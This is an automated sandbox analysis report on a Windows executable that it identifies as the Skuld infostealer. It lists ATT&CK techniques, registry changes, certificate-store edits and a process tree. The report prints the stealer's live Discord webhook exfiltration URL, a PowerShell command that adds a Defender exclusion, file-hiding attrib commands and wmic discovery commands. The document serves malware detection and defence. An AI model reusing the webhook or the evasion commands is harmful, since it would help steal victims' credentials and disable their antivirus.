skuld | 4e01f67d085ba2a7adf841ddd17abd8a315589084b08f57aa38f2d94fad2f096

Analysis

max time kernel
600s
max time network
467s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
04-12-2024 19:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scarlet - Leaked/Leaked by Bm666 (7.5).exe
Size

9.5MB
MD5

24b21ce0ed7f316e6c01fd3d0ee6b5ce
SHA1

d79b1cb928fb1474b17bb0c47f86984bbffcc48e
SHA256

4a755f2a58e81e25763f504e5bea95a94ee6205aa79798aff61ccf60aa98382f
SHA512

4612c3cfe97457104f8e88502ebc1c3b4874a4c8569d52993748da4f9f48e8a07ca11dcc2921992d7e7ba09147255f6981ed4ff7dbf9aee6eb5e58ba81547b8c
SSDEEP

98304:ZYV6CCYzwyyJOmzPx0NEzB5IEPqSF8u83e:k5CYzcgUx0NEV5hPR83e

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1239446722099286036/03iTGgnO1RXQSJpzERDxtEJ1DFuminwxIxeZh8ICScbvQq6rVvo6IKfigRDYRYMvbGSj

Signatures

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1468	powershell.exe
2936	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Leaked by Bm666 (7.5).exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	Leaked by Bm666 (7.5).exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	discord.com
7	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
1	ip-api.com
2	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Leaked by Bm666 (7.5).exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	Leaked by Bm666 (7.5).exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
424	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6024	wmic.exe
2368	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	5	Go-http-client/1.1

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Leaked by Bm666 (7.5).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Leaked by Bm666 (7.5).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Leaked by Bm666 (7.5).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Leaked by Bm666 (7.5).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Leaked by Bm666 (7.5).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Leaked by Bm666 (7.5).exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2936	powershell.exe
2936	powershell.exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
1468	powershell.exe
1468	powershell.exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe
2816	Leaked by Bm666 (7.5).exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	Leaked by Bm666 (7.5).exe
Token: SeIncreaseQuotaPrivilege	468	wmic.exe
Token: SeSecurityPrivilege	468	wmic.exe
Token: SeTakeOwnershipPrivilege	468	wmic.exe
Token: SeLoadDriverPrivilege	468	wmic.exe
Token: SeSystemProfilePrivilege	468	wmic.exe
Token: SeSystemtimePrivilege	468	wmic.exe
Token: SeProfSingleProcessPrivilege	468	wmic.exe
Token: SeIncBasePriorityPrivilege	468	wmic.exe
Token: SeCreatePagefilePrivilege	468	wmic.exe
Token: SeBackupPrivilege	468	wmic.exe
Token: SeRestorePrivilege	468	wmic.exe
Token: SeShutdownPrivilege	468	wmic.exe
Token: SeDebugPrivilege	468	wmic.exe
Token: SeSystemEnvironmentPrivilege	468	wmic.exe
Token: SeRemoteShutdownPrivilege	468	wmic.exe
Token: SeUndockPrivilege	468	wmic.exe
Token: SeManageVolumePrivilege	468	wmic.exe
Token: 33	468	wmic.exe
Token: 34	468	wmic.exe
Token: 35	468	wmic.exe
Token: 36	468	wmic.exe
Token: SeIncreaseQuotaPrivilege	468	wmic.exe
Token: SeSecurityPrivilege	468	wmic.exe
Token: SeTakeOwnershipPrivilege	468	wmic.exe
Token: SeLoadDriverPrivilege	468	wmic.exe
Token: SeSystemProfilePrivilege	468	wmic.exe
Token: SeSystemtimePrivilege	468	wmic.exe
Token: SeProfSingleProcessPrivilege	468	wmic.exe
Token: SeIncBasePriorityPrivilege	468	wmic.exe
Token: SeCreatePagefilePrivilege	468	wmic.exe
Token: SeBackupPrivilege	468	wmic.exe
Token: SeRestorePrivilege	468	wmic.exe
Token: SeShutdownPrivilege	468	wmic.exe
Token: SeDebugPrivilege	468	wmic.exe
Token: SeSystemEnvironmentPrivilege	468	wmic.exe
Token: SeRemoteShutdownPrivilege	468	wmic.exe
Token: SeUndockPrivilege	468	wmic.exe
Token: SeManageVolumePrivilege	468	wmic.exe
Token: 33	468	wmic.exe
Token: 34	468	wmic.exe
Token: 35	468	wmic.exe
Token: 36	468	wmic.exe
Token: SeIncreaseQuotaPrivilege	6024	wmic.exe
Token: SeSecurityPrivilege	6024	wmic.exe
Token: SeTakeOwnershipPrivilege	6024	wmic.exe
Token: SeLoadDriverPrivilege	6024	wmic.exe
Token: SeSystemProfilePrivilege	6024	wmic.exe
Token: SeSystemtimePrivilege	6024	wmic.exe
Token: SeProfSingleProcessPrivilege	6024	wmic.exe
Token: SeIncBasePriorityPrivilege	6024	wmic.exe
Token: SeCreatePagefilePrivilege	6024	wmic.exe
Token: SeBackupPrivilege	6024	wmic.exe
Token: SeRestorePrivilege	6024	wmic.exe
Token: SeShutdownPrivilege	6024	wmic.exe
Token: SeDebugPrivilege	6024	wmic.exe
Token: SeSystemEnvironmentPrivilege	6024	wmic.exe
Token: SeRemoteShutdownPrivilege	6024	wmic.exe
Token: SeUndockPrivilege	6024	wmic.exe
Token: SeManageVolumePrivilege	6024	wmic.exe
Token: 33	6024	wmic.exe
Token: 34	6024	wmic.exe
Token: 35	6024	wmic.exe
Token: 36	6024	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 5736	2816	Leaked by Bm666 (7.5).exe	78
PID 2816 wrote to memory of 5736	2816	Leaked by Bm666 (7.5).exe	78
PID 2816 wrote to memory of 5848	2816	Leaked by Bm666 (7.5).exe	80
PID 2816 wrote to memory of 5848	2816	Leaked by Bm666 (7.5).exe	80
PID 2816 wrote to memory of 468	2816	Leaked by Bm666 (7.5).exe	82
PID 2816 wrote to memory of 468	2816	Leaked by Bm666 (7.5).exe	82
PID 2816 wrote to memory of 6024	2816	Leaked by Bm666 (7.5).exe	85
PID 2816 wrote to memory of 6024	2816	Leaked by Bm666 (7.5).exe	85
PID 2816 wrote to memory of 2936	2816	Leaked by Bm666 (7.5).exe	87
PID 2816 wrote to memory of 2936	2816	Leaked by Bm666 (7.5).exe	87
PID 2816 wrote to memory of 6028	2816	Leaked by Bm666 (7.5).exe	89
PID 2816 wrote to memory of 6028	2816	Leaked by Bm666 (7.5).exe	89
PID 2816 wrote to memory of 1656	2816	Leaked by Bm666 (7.5).exe	91
PID 2816 wrote to memory of 1656	2816	Leaked by Bm666 (7.5).exe	91
PID 2816 wrote to memory of 1468	2816	Leaked by Bm666 (7.5).exe	93
PID 2816 wrote to memory of 1468	2816	Leaked by Bm666 (7.5).exe	93
PID 2816 wrote to memory of 2368	2816	Leaked by Bm666 (7.5).exe	95
PID 2816 wrote to memory of 2368	2816	Leaked by Bm666 (7.5).exe	95
PID 2816 wrote to memory of 1044	2816	Leaked by Bm666 (7.5).exe	97
PID 2816 wrote to memory of 1044	2816	Leaked by Bm666 (7.5).exe	97
PID 2816 wrote to memory of 668	2816	Leaked by Bm666 (7.5).exe	99
PID 2816 wrote to memory of 668	2816	Leaked by Bm666 (7.5).exe	99
PID 2816 wrote to memory of 712	2816	Leaked by Bm666 (7.5).exe	101
PID 2816 wrote to memory of 712	2816	Leaked by Bm666 (7.5).exe	101
PID 2816 wrote to memory of 424	2816	Leaked by Bm666 (7.5).exe	103
PID 2816 wrote to memory of 424	2816	Leaked by Bm666 (7.5).exe	103
PID 2816 wrote to memory of 2568	2816	Leaked by Bm666 (7.5).exe	105
PID 2816 wrote to memory of 2568	2816	Leaked by Bm666 (7.5).exe	105
PID 2568 wrote to memory of 5288	2568	powershell.exe	107
PID 2568 wrote to memory of 5288	2568	powershell.exe	107
PID 5288 wrote to memory of 5084	5288	csc.exe	108
PID 5288 wrote to memory of 5084	5288	csc.exe	108

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5736	attrib.exe
5848	attrib.exe
668	attrib.exe
712	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Leaked by Bm666 (7.5).exe
"C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Leaked by Bm666 (7.5).exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Leaked by Bm666 (7.5).exe"
  2⤵
  - Views/modifies file attributes
  PID:5736
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:5848
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:468
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:6024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Scarlet - Leaked\Leaked by Bm666 (7.5).exe"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2936
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:6028
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:1656
